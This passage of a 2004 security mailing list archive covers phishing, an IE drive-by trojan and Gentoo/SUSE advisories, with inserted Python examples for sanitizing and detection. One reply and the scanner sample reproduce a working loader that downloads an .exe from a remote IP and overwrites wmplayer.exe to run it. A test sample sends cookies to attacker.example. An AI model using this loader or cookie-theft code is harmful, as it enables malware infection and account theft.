making them open targets for use as minions. And the perfect seed
for spreading them is the databases of email addresses used by
spammers...
What's interesting is that in contrast to old-school protection
rackets, there appears to be no offering of protection from attack
by others.
Darren
Re: [Full-Disclosure] Akamai
From: tcleary2@csc.com.au
Date: Tue Jun 15 2004 - 23:55:23 CDT
Darren Reed said:
>What's interesting is that in contrast to old-school protection
>rackets, there appears to be no offering of protection from attack
>by others.
IIRC the main purpose of DoS attacks ( apart from kiddie fights )
is to allow a trust exploit/MITM to succeed - e.g. session hijacking.
Maybe someone wanted to plant something by pretending to be the
WindowsUpdate site?
If you're akamai'd, poisoning DNS would be harder, but changing
IP address wouldn't seem unusual, would it?
Regards,
tom.
----------------------------------------------------------------------------------------
Tom Cleary - Security Architect
"In IT, acceptable solutions depend upon humans - Computers don't
negotiate."
----------------------------------------------------------------------------------------
RE: [Full-Disclosure] US Bank scam
From: wszumera@borgwarner.com
Date: Tue Jun 15 2004 - 23:37:54 CDT
> -----Original Message-----
> From: David Lederman [mailto:delphi4pro@yahoo.com]
> Sent: Tuesday, June 15, 2004 12:30 PM
> To: full-disclosure@lists.netsys.com
> Subject: [Full-Disclosure] US Bank scam
>
>
> This is the best phishing scam I've seen yet:
> http://www.bis1bp.com/a12/index.html
>
> I have Windows Server 2003 fully patched and this works. The
> program fakes an address bar so this
> would pass through most people's safety check, after all the
> address bar clearly has the correct
> address.
>
> There are bugs in the code, for example, all your Internet
> Explorer windows will now have this
> address, but again for most people would only have one window open.
>
If you drag the explorer window around a bit, the address bar lags behind.
W
[Full-Disclosure] Akamai DoS - insider job?
From: Feher Tamas (etomcat@freemail.hu)
Date: Wed Jun 16 2004 - 05:09:05 CDT
http://www.overclockersclub.com/?read=8733819
The Akamai attacks started in the morning and it was detected by
Keynote Systems, a web tracking company that is able to track the load
and bandwidth on the Internet. According to Keynote they saw
an "Internet performance issue" this morning
...
They have tracked the attacker back to person that is at the Akamai
Technologies ISP. No other information has been given to us at this
time. We do not know if the FBI is working on this issue right now, but
we expect them to do so.
[Full-Disclosure] spamming trojan?
From: Geo. (geoincidents@nls.net)
Date: Wed Jun 16 2004 - 07:23:59 CDT
Received a spam this morning claiming I have a voicemail with the link
(warning do not click the link)
http:-//www-1voicemailbox-net/voicemail/ (dashes added by me)
which brings up a frames based page with one of the frames containing this
function InjectedDuringRedirection(){
showModalDialog('md.htm',window,"dialogTop:-10000\;dialogLeft:-10000\;dialogHeight:1\;dialogWidth:1\;").location="javascript:'<SCRIPT SRC=\\'http://219.234.95.124/vbox/shellscript_loader.js\\'><\/script>'";
Anyone want to try and analyze what this thing is? It was spammed to about
30 addresses here this morning.
Geo.
Re: [Full-Disclosure] spamming trojan?
From: Joe Stewart (jstewart@lurhq.com)
Date: Wed Jun 16 2004 - 07:44:43 CDT
On Wed, 16 Jun 2004 08:23:59, geoincidents@nls.net wrote:
> Anyone want to try and analyze what this thing is? It was spammed to
> about 30 addresses here this morning.
The end stage appears to be a new variant of the Cjdra proxy trojan.
This person has been spreading trojans via spammed-exploit for a while
now, and now it looks as if he/she has upgraded to the latest IE
exploit.
http://vil.nai.com/vil/content/v_100939.htm describes an older variant.
-Joe
--
Joe Stewart, GCIH
Senior Security Researcher
LURHQ http://www.lurhq.com/
[Full-Disclosure] Re: Multiple Antivirus Scanners DoS attack.
From: Luca Gibelli (luca@clamav.net)
Date: Wed Jun 16 2004 - 07:47:41 CDT
> *DrWeb (http://www.drweb.ru/)
> *AVG v7.0.251
> *ClamAV version 0.70, 0.72 <--- please confirm this!
> *eTrust InoculateIT version 6.0
> Are vulnerable.
ClamAV is not vulnerable and hasn't been for a long time (at least
since 0.6x IIRC).
Just try it:
$ clamscan SERVER_dwn.zip
SERVER_dwn.zip: Oversized.Zip FOUND
--
Luca Gibelli (luca@clamav.net) - http://www.ClamAV.net - A GPL virus scanner
PGP Key Fingerprint: C782 121E 8C3A 90E3 7A87 D802 6277 8FF4 5EFC 5582
PGP Key Available on: Key Servers || http://www.clamav.net/gpg/nervoso.gpg
RE: [Full-Disclosure] Antivirus/Trojan/Spyware scanners DoS!
From: Geo. (georger@nls.net)
Date: Wed Jun 16 2004 - 07:22:48 CDT
Received a spam this morning claiming I have a voicemail with the link
(warning do not click the link)
http:-//www-1voicemailbox-net/voicemail/ (dashes added by me)
which brings up a frames based page with one of the frames containing this
function InjectedDuringRedirection(){
showModalDialog('md.htm',window,"dialogTop:-10000\;dialogLeft:-10000\;dialogHeight:1\;dialogWidth:1\;").location="javascript:'<SCRIPT SRC=\\'http://219.234.95.124/vbox/shellscript_loader.js\\'><\/script>'";
Anyone want to try and analyze what this thing is? It was spammed to about
30 addresses here this morning.
Geo.
[Full-Disclosure] [ GLSA 200406-11 ] Horde-IMP: Input validation vulnerability
From: Kurt Lieber (klieber@gentoo.org)
Date: Wed Jun 16 2004 - 08:25:32 CDT
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200406-11
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: Horde-IMP: Input validation vulnerability
Date: June 16, 2004
Bugs: #53862
ID: 200406-11
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
An input validation vulnerability has been discovered in Horde-IMP.
Background
==========
Horde-IMP is the Internet Messaging Program. It is written in PHP and
provides webmail access to IMAP and POP3 accounts.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-www/horde-imp <= 3.2.3 >= 3.2.4
Description
===========
Horde-IMP fails to properly sanitize email messages that contain
malicious HTML or script code.
Impact
======
By enticing a user to read a specially crafted e-mail, an attacker can
execute arbitrary scripts running in the context of the victim's
browser. This could lead to a compromise of the user's webmail account,
cookie theft, etc.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Horde-IMP users should upgrade to the latest stable version:
# emerge sync
# emerge -pv ">=horde-imp-3.2.4"
# emerge ">=horde-imp-3.2.4"
References
==========
[ 1 ] Bugtraq Announcement
http://www.securityfocus.com/bid/10501
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-200406-11.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.
License
=======
Copyright 2004 Gentoo Technologies, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/1.0
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
iD8DBQFA0EpMJPpRNiftIEYRAjZFAJ42DouOm6MRj7FRWplm+F8yRwdaOwCgi+6N
WILtMGU+v7jbt3OQ+bqYGLg=
=MrCt
-----END PGP SIGNATURE-----
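The advisory above describes the bug class (HTML mail rendered without proper sanitization) but not the fix. As an added example, which is not Horde's code and not the change shipped in IMP 3.2.4, here is the vulnerable shape beside a hardened one in Python: the first strips only <script> blocks, the second rebuilds the message from an allowlist of tags and attributes and rejects any href whose scheme is not http, https or mailto. The hostile message is constructed for the example; attacker.example and example.com are placeholder hosts.

```python
import re
from html import escape
from html.parser import HTMLParser

# Constructed hostile message: the three classic webmail XSS carriers (a script
# block, an event-handler attribute, a javascript: link) plus a style attribute.
HOSTILE_MAIL = """<p>Hi,</p>
<script>document.location='http://attacker.example/?c='+document.cookie</script>
<img src="x" onerror="document.location='http://attacker.example/?c='+document.cookie">
<a href="javascript:alert(document.cookie)">invoice</a>
<a href="http://example.com/invoice">real invoice</a>
<p style="background:url(javascript:alert(1))">see attached &lt;script&gt;</p>"""


def strip_script_tags(html):
    """Vulnerable form: a denylist that removes <script> blocks and nothing else.
    Event handlers and javascript: URLs pass straight through to the browser."""
    return re.sub(r"<script\b.*?</script>", "", html, flags=re.I | re.S)


ALLOWED_TAGS = {"p", "br", "b", "i", "u", "em", "strong", "a",
                "ul", "ol", "li", "blockquote"}
ALLOWED_ATTRS = {"a": {"href"}}          # no style, no on* handlers anywhere
SAFE_SCHEMES = ("http://", "https://", "mailto:")
VOID_TAGS = {"br"}
DROP_CONTENT = {"script", "style"}       # drop the element and its text


class AllowlistSanitizer(HTMLParser):
    """Hardened form: rebuild the message from an allowlist. Anything not
    explicitly permitted (tags, attributes, URL schemes, comments) is dropped."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self._dropping = 0   # >0 while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT:
            self._dropping += 1
            return
        if self._dropping or tag not in ALLOWED_TAGS:
            return
        kept = ""
        for name, value in attrs:
            if value is None or name not in ALLOWED_ATTRS.get(tag, ()):
                continue
            if name == "href":
                # collapse whitespace so "java\tscript:" cannot sneak past
                compact = "".join(value.split()).lower()
                if not compact.startswith(SAFE_SCHEMES):
                    continue
            kept += ' %s="%s"' % (name, escape(value, quote=True))
        self.out.append("<%s%s>" % (tag, kept))

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT:
            self._dropping = max(0, self._dropping - 1)
        elif not self._dropping and tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append("</%s>" % tag)

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)
        if tag not in VOID_TAGS:
            self.handle_endtag(tag)

    def handle_data(self, data):
        if not self._dropping:
            self.out.append(escape(data, quote=False))   # re-encode < > &

    def handle_comment(self, data):
        pass   # IE conditional comments can carry markup; never echo them


def sanitize(html):
    """Return the allowlisted, re-serialised message body."""
    p = AllowlistSanitizer()
    p.feed(html)
    p.close()
    return "".join(p.out)


if __name__ == "__main__":
    print("denylist :", strip_script_tags(HOSTILE_MAIL))
    print("allowlist:", sanitize(HOSTILE_MAIL))
```

Run as-is it prints both outputs for the constructed message: the denylist version still carries the onerror handler and the javascript: link, the allowlist version keeps only the paragraphs, the text and the http link. The design point is that the parser re-serialises from its own token stream rather than editing the attacker's bytes, so malformed markup that a regex would misread is never passed through.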
[Full-Disclosure] [ GLSA 200406-12 ] Webmin: Multiple vulnerabilities
From: Kurt Lieber (klieber@gentoo.org)
Date: Wed Jun 16 2004 - 08:31:46 CDT
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200406-12
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: Webmin: Multiple vulnerabilities
Date: June 16, 2004
Bugs: #53375
ID: 200406-12
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Webmin contains two security vulnerabilities which could lead to a
Denial of Service attack and information disclosure.
Background
==========
Webmin is a web-based administration tool for Unix. It supports a wide
range of applications including Apache, DNS, file sharing and others.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 app-admin/webmin <= 1.140-r1 >= 1.150
Description
===========
Webmin contains two security vulnerabilities. One allows any user to
view the configuration of any module and the other could allow an
attacker to lock out a valid user by sending an invalid username and
password.
Impact
======
An authenticated user could use these vulnerabilities to view the
configuration of any module thus potentially obtaining important
knowledge about configuration settings. Furthermore an attacker could
lock out legitimate users by sending invalid login information.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Webmin users should upgrade to the latest stable version:
# emerge sync
# emerge -pv ">=app-admin/webmin-1.150"
# emerge ">=app-admin/webmin-1.150"
References
==========
[ 1 ] Bugtraq Announcement
http://www.securityfocus.com/bid/10474
[ 2 ] Webmin Changelog
http://www.webmin.com/changes-1.150.html
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-200406-12.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.
License
=======
Copyright 2004 Gentoo Technologies, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/1.0
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
iD8DBQFA0EvCJPpRNiftIEYRAuwwAJ9yiTRu6OrHG75hSaDodlcOaQZOnQCeLN34
mgx1zdZtYryslTUukRRoWY8=
=EBe6
-----END PGP SIGNATURE-----
Re: [Full-Disclosure] spamming trojan?
From: Michael Gargiullo (mgargiullo@warpdrive.net)
Date: Wed Jun 16 2004 - 08:59:43 CDT
On Wed, 2004-06-16 at 08:23, Geo. wrote:
> Received a spam this morning claiming I have a voicemail with the link
> (warning do not click the link)
>
> http:-//www-1voicemailbox-net/voicemail/ (dashes added by me)
>
> which brings up a frames based page with one of the frames containing this
>
> function InjectedDuringRedirection(){
>
> showModalDialog('md.htm',window,"dialogTop:-10000\;dialogLeft:-10000\;dialogHeight:1\;dialogWidth:1\;").location="javascript:'<SCRIPT SRC=\\'http://219.234.95.124/vbox/shellscript_loader.js\\'><\/script>'";
>
> Anyone want to try and analyze what this thing is? It was spammed to about
> 30 addresses here this morning.
>
> Geo.
Here's the contents:
// 1. Fetch the payload with the XMLHTTP control; third argument 0 = synchronous
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://219.234.95.124/vbox/w_e_d.exe",0);
x.Send();
// 2. ADODB.Stream can write arbitrary bytes to the local disk from script,
//    which is what turns a page visit into a file drop
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;   // adModeReadWrite
s.Type = 1;   // adTypeBinary
s.Open();
s.Write(x.responseBody);
// 3. Overwrite Windows Media Player's binary (2 = adSaveCreateOverWrite) ...
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
// 4. ... then an mms:// URL makes IE hand off to the player, i.e. run the payload
location.href = "mms://";
so whatever w_e_d.exe is...
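As an added example that is not part of the thread, a small Python scanner for the loader chain quoted above: an off-screen showModalDialog whose window is navigated to a javascript: URL, an XMLHTTP fetch of an .exe, an ADODB.Stream SaveToFile that overwrites a local binary, and a protocol-handler URL that launches it. The signature names, weights and threshold are my own; both sample pages are constructed (the hostile one reassembles the two fragments posted in this thread inside a frameset wrapper I added).

```python
import re

# Constructed sample page: the frame fragment and the loader script quoted in
# this thread, reassembled into one document. The frameset line is my addition.
HOSTILE_PAGE = r"""<html><frameset rows="*,0"><frame src="index.htm"><frame src="r.htm"></frameset>
<script>
function InjectedDuringRedirection(){
showModalDialog('md.htm',window,"dialogTop:-10000\;dialogLeft:-10000\;dialogHeight:1\;dialogWidth:1\;").location="javascript:'<SCRIPT SRC=\\'http://219.234.95.124/vbox/shellscript_loader.js\\'><\/script>'";
}
</script>
<script>
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://219.234.95.124/vbox/w_e_d.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3; s.Type = 1; s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";
</script></html>
"""

# Constructed benign page: a modal dialog used for an ordinary confirmation.
BENIGN_PAGE = """<html><body><script>
function confirmDelete(){ return showModalDialog('confirm.htm', null, 'dialogWidth:300px;'); }
</script><a href="http://example.com/help">help</a></body></html>
"""

# One signature per stage of the chain. Names and weights are my own choice.
SIGNATURES = [
    ("offscreen-modal-dialog", 2,
     re.compile(r"showModalDialog\s*\([^)]*dialog(?:Top|Left)\s*:\s*-\d{3,}", re.I)),
    ("javascript-url-into-dialog", 3,
     re.compile(r"\.location\s*=\s*[\"']javascript:", re.I)),
    ("xmlhttp-fetch-exe", 2,
     re.compile(r"\.Open\s*\(\s*[\"']GET[\"']\s*,\s*[\"'][^\"']*\.exe[\"']", re.I)),
    ("adodb-stream", 2,
     re.compile(r"ActiveXObject\s*\(\s*[\"']ADODB\.Stream[\"']\s*\)", re.I)),
    ("savetofile", 3,
     re.compile(r"\.SaveToFile\s*\(", re.I)),
    ("protocol-handler-launch", 1,
     re.compile(r"location\.href\s*=\s*[\"'](?:mms|telnet|file):", re.I)),
]
URL_RE = re.compile(r"https?://[^\s\"'<>\\]+", re.I)
THRESHOLD = 5   # a fetch plus a disk write, or the dialog trick plus either, trips it


def scan(document):
    """Run every signature over a page and report which stages are present,
    a score, the remote URLs the page would contact, and a verdict."""
    hits = [(name, weight) for name, weight, rx in SIGNATURES if rx.search(document)]
    score = sum(weight for _, weight in hits)
    return {
        "indicators": [name for name, _ in hits],
        "score": score,
        "urls": sorted(set(URL_RE.findall(document))),
        "verdict": "driveby-download" if score >= THRESHOLD else "clean",
    }


if __name__ == "__main__":
    for label, page in (("hostile", HOSTILE_PAGE), ("benign", BENIGN_PAGE)):
        print(label, scan(page))
```

Run as-is it prints a verdict for both samples, with the two 219.234.95.124 URLs pulled out of the hostile one for blocking. This is a string-level check, so split-string or encoded variants will get past it; its value is in flagging the combination, since ADODB.Stream plus SaveToFile has no legitimate use in a web page, and in extracting the download host. The mitigation Microsoft later shipped was to set the kill bit on the ADODB.Stream control for Internet Explorer.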
[Full-Disclosure] SUSE Security Announcement: kernel (SuSE-SA:2004:017)
From: Thomas Biege (thomas@suse.de)
Date: Wed Jun 16 2004 - 09:14:18 CDT
-----BEGIN PGP SIGNED MESSAGE-----
______________________________________________________________________________
SUSE Security Announcement
Package: kernel
Announcement-ID: SuSE-SA:2004:017
Date: Wednesday, Jun 16th 2004 15:20 MEST
Affected products: 8.0, 8.1, 8.2, 9.0, 9.1
SuSE Linux Database Server,
SuSE eMail Server III, 3.1
SuSE Linux Enterprise Server 7, 8
SuSE Linux Firewall on CD/Admin host
SuSE Linux Connectivity Server
SuSE Linux Office Server
Vulnerability Type: local denial-of-service attack
Severity (1-10): 4
SUSE default package: no
Cross References: CAN-2004-0554
Content of this advisory:
1) security vulnerability resolved:
- floating point exception causes system crash
problem description, discussion, solution and upgrade information
2) pending vulnerabilities, solutions, workarounds:
- icecast
- sitecopy
- cadaver
- OpenOffice_org
- tripwire
- postgresql
- lha
- XDM
- mod_proxy
3) standard appendix (further information)
______________________________________________________________________________
1) problem description, brief discussion, solution, upgrade information
The Linux kernel is vulnerable to a local denial-of-service attack.
By using a C program it is possible to trigger a floating point
exception that puts the kernel into an unusable state.
To execute this attack a malicious user needs shell access to the
victim's machine.
The severity of this bug is considered low because local denial-of-
service attacks are hard to prevent in general.
Additionally the bug is limited to x86 and x86_64 architecture.
SPECIAL INSTALL INSTRUCTIONS:
==============================
The following paragraphs will guide you through the installation
process in a step-by-step fashion. The character sequence "****"
marks the beginning of a new paragraph. In some cases, the steps
outlined in a particular paragraph may or may not be applicable
to your situation.
Therefore, please make sure to read through all of the steps below
before attempting any of these procedures.
All of the commands that need to be executed are required to be
run as the superuser (root). Each step relies on the steps before
it to complete successfully.
Note: The update packages for the SuSE Linux Enterprise Server 7
(SLES7) are being tested at the moment and will be published as soon
as possible.
**** Step 1: Determine the needed kernel type
Please use the following command to find the kernel type that is
installed on your system:
rpm -qf /boot/vmlinuz
Following are the possible kernel types (disregard the version and
build number following the name separated by the "-" character)
k_deflt # default kernel, good for most systems.
k_i386 # kernel for older processors and chipsets
k_athlon # kernel made specifically for AMD Athlon(tm) family processors
k_psmp # kernel for Pentium-I dual processor systems
k_smp # kernel for SMP systems (Pentium-II and above)
k_smp4G # kernel for SMP systems which supports a maximum of 4G of RAM
kernel-64k-pagesize
kernel-bigsmp
kernel-default
kernel-smp
**** Step 2: Download the package for your system
Please download the kernel RPM package for your distribution with the
name as indicated by Step 1. The list of all kernel rpm packages is
appended below. Note: The kernel-source package does not
contain a binary kernel in bootable form. Instead, it contains the
sources that the binary kernel rpm packages are created from. It can be
used by administrators who have decided to build their own kernel.
Since the kernel-source.rpm is an installable (compiled) package that
contains sources for the linux kernel, it is not the source RPM for
the kernel RPM binary packages.
The kernel RPM binary packages for the distributions can be found at the
locations below ftp://ftp.suse.com/pub/suse/i386/update/.
8.0/images/
8.1/rpm/i586
8.2/rpm/i586
9.0/rpm/i586
9.1/rpm/i586
After downloading the kernel RPM package for your system, you should
verify the authenticity of the kernel rpm package using the methods as
listed in section 3) of each SUSE Security Announcement.
**** Step 3: Installing your kernel rpm package
Install the rpm package that you have downloaded in Step 2 with
the command
rpm -Uhv --nodeps --force <K_FILE.RPM>
where <K_FILE.RPM> is the name of the rpm package that you downloaded.
Warning: After performing this step, your system will likely not be
able to boot if the following steps have not been fully
followed.
If you run SUSE LINUX 8.1 and haven't applied the kernel update
(SUSE-SA:2003:034), AND you are using the freeswan package, you also
need to update the freeswan rpm as a dependency as offered
by YOU (YaST Online Update). The package can be downloaded from
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/
**** Step 4: configuring and creating the initrd
The initrd is a ramdisk that is loaded into the memory of your
system together with the kernel boot image by the bootloader. The
kernel uses the content of this ramdisk to execute commands that must
be run before the kernel can mount its actual root filesystem. It is
usually used to initialize SCSI drivers or NIC drivers for diskless
operation.
The variable INITRD_MODULES in /etc/sysconfig/kernel determines
which kernel modules will be loaded in the initrd before the kernel
has mounted its actual root filesystem. The variable should contain
your SCSI adapter (if any) or filesystem driver modules.
With the installation of the new kernel, the initrd has to be
re-packed with the update kernel modules. Please run the command
mk_initrd
as root to create a new init ramdisk (initrd) for your system.
On SuSE Linux 8.1 and later, this is done automatically when the
RPM is installed.
**** Step 5: bootloader
If you run a SUSE LINUX 8.x, SLES8, or SUSE LINUX 9.x system, there
are two cases, depending on your software configuration: either the
lilo bootloader or the grub bootloader is installed and initialized on
your system.
The grub bootloader does not require any further actions to be
performed after the new kernel images have been moved in place by the
rpm Update command.
If you have a lilo bootloader installed and initialized, then the lilo
program must be run as root. Use the command
grep LOADER_TYPE /etc/sysconfig/bootloader
to find out which boot loader is configured. If it is lilo, then you
must run the lilo command as root. If grub is listed, then your system
does not require any bootloader initialization.
Warning: An improperly installed bootloader may render your system
unbootable.
**** Step 6: reboot
If all of the steps above have been successfully completed on your
system, then the new kernel including the kernel modules and the
initrd should be ready to boot. The system needs to be rebooted for
the changes to become active. Please make sure that all steps have
completed, then reboot using the command
shutdown -r now
or
init 6
Your system should now shut down and reboot with the new kernel.
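Steps 4 to 6 come down to two sysconfig values and a version check, so here is an added example (my own code, not a SUSE script) that reads those values and produces the ordered list of commands to run before rebooting, refusing to proceed when the bootloader type is not one the steps cover. Assumptions: /etc/SuSE-release carries a `VERSION = x.y` line, the file paths are the ones named in the steps, and the command names are only those the steps give.

```python
"""Added example (not a SUSE script): turn Steps 4-6 into a reviewable plan.

Reads INITRD_MODULES and LOADER_TYPE from the sysconfig files named above,
decides whether mk_initrd and lilo must be run, and only then reboots.
"""
import re
import subprocess
from typing import List, Tuple


def sysconfig_value(text: str, key: str) -> str:
    """Value of KEY="..." (or KEY=...) in /etc/sysconfig-style text; '' if unset."""
    m = re.search(rf'^{re.escape(key)}="?([^"\n]*)"?', text, re.MULTILINE)
    return m.group(1).strip() if m else ""


def initrd_modules(kernel_cfg: str) -> List[str]:
    """Modules that mk_initrd will pack into the initrd (Step 4)."""
    return sysconfig_value(kernel_cfg, "INITRD_MODULES").split()


def suse_version(release_text: str) -> Tuple[int, int]:
    """(major, minor) from a 'VERSION = 9.1' line; assumed format of /etc/SuSE-release."""
    m = re.search(r"^VERSION\s*=\s*(\d+)\.(\d+)", release_text, re.MULTILINE)
    if not m:
        raise ValueError("no VERSION line found")
    return int(m.group(1)), int(m.group(2))


def plan_post_install(version: Tuple[int, int], kernel_cfg: str,
                      bootloader_cfg: str) -> List[List[str]]:
    """Commands to run after the kernel rpm is installed, in order.

    Step 4: before 8.1 the rpm does not re-pack the initrd, so mk_initrd is needed.
    Step 5: lilo must be re-run; grub needs nothing; anything else is refused,
            since an unverified bootloader can leave the system unbootable.
    Step 6: reboot only as the last action.
    """
    plan: List[List[str]] = []
    if version < (8, 1):
        plan.append(["mk_initrd"])
    loader = sysconfig_value(bootloader_cfg, "LOADER_TYPE")
    if loader == "lilo":
        plan.append(["lilo"])
    elif loader != "grub":
        raise RuntimeError(f"LOADER_TYPE={loader!r} not recognised; check the bootloader by hand")
    plan.append(["shutdown", "-r", "now"])
    return plan


def run_plan(plan: List[List[str]], dry_run: bool = True) -> None:
    """Execute the plan as root. check=True stops at the first failing step, so a
    failed mk_initrd or lilo never reaches the reboot."""
    for cmd in plan:
        if dry_run:
            print("would run:", " ".join(cmd))
        else:
            subprocess.run(cmd, check=True)


if __name__ == "__main__":
    # Constructed sample inputs standing in for the real files.
    kcfg = 'INITRD_MODULES="reiserfs aic7xxx"\n'
    bcfg = '## Type: string\nLOADER_TYPE="lilo"\n'
    print("initrd modules:", initrd_modules(kcfg))
    run_plan(plan_post_install(suse_version("VERSION = 8.0\n"), kcfg, bcfg))
```

`run_plan` defaults to a dry run that only prints the commands; with `dry_run=False` it runs them as root, and because each step is checked, a failing `mk_initrd` or `lilo` aborts before the reboot, which is exactly the situation the warnings in Steps 3 and 5 describe.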
There is no workaround known.
Please download the update package for your distribution and verify its
integrity by the methods listed in section 3) of this announcement.
Then, install the package using the command "rpm -Fhv file.rpm" to apply
the update.
Our maintenance customers are being notified individually. The packages
are being offered to install from the maintenance web.
Intel i386 Platform:
SuSE-9.1:
ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kernel-source-2.6.5-7.75.i586.rpm
8d11469e1815c5b2fa143fce62c17b95
ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kernel-default-2.6.5-7.75.i586.rpm
75222182ad4c766b6482e5b83658819d
ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kernel-smp-2.6.5-7.75.i586.rpm
45f1244f153ab1387a9dc67e7bcf20bb
ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kernel-bigsmp-2.6.5-7.75.i586.rpm
517647d955770503fe61ae2549c453dd
source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/kernel-source-2.6.5-7.75.src.rpm
9103503f430b9d854630ecb8855a2fb3
ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/kernel-default-2.6.5-7.75.nosrc.rpm
9381c56f1f64835c5379dde278ac768d
ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/kernel-smp-2.6.5-7.75.nosrc.rpm
4f47dc2be58f5315cf596c051c2892b5
ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/kernel-bigsmp-2.6.5-7.75.nosrc.rpm
732c1e7d2a9e41780464eccdc0d54505
SuSE-9.0:
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/kernel-source-2.4.21-226.i586.rpm
7b6022e2f80325b42fa7dc3188360530
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_athlon-2.4.21-226.i586.rpm
594efe04ccc233e890bfb277e8296c2d
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_deflt-2.4.21-226.i586.rpm
f41d088cf20bfe583e57f95a6b46d625
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_smp-2.4.21-226.i586.rpm
39e2c09ece3f22b50eb777b85a7218ef
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_smp4G-2.4.21-226.i586.rpm
83398954810403b9dfb65bcf1af25352
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_um-2.4.21-226.i586.rpm
18dde4a8af68dd1f78a0177c3214457a
source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/kernel-source-2.4.21-226.src.rpm
d5b037aaf122b1b05917e3f0b475baae
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_athlon-2.4.21-226.src.rpm
e10aea97785eb12716ad7d5e20cbd723
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_deflt-2.4.21-226.src.rpm
54b8bbd368998abc1a63224caa880473
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_smp-2.4.21-226.src.rpm
f944b14978ecd211c26f8169238292bf
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_smp4G-2.4.21-226.src.rpm
66a116aeb9757c538a0643e8322095a7
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_um-2.4.21-226.src.rpm
5e3694ba088fd39891a5979380679d20
SuSE-8.2:
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/kernel-source-2.4.20.SuSE-113.i586.rpm
a5843cb4e2b16515d70574d83113ac48
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/k_athlon-2.4.20-113.i586.rpm
724529485d3a304f0479f9216fc361af
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/k_deflt-2.4.20-113.i586.rpm
b0e687c208053d546b7057257beb7d32
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/k_psmp-2.4.20-113.i586.rpm
749b101e7fc4aa5c62e2a5b650002803
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/k_smp-2.4.20-113.i586.rpm
3377544a5f6d9c73fdfe05140fce0813
source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/kernel-source-2.4.20.SuSE-113.src.rpm
0a41c750b8cd3953d47e27ea15c58697
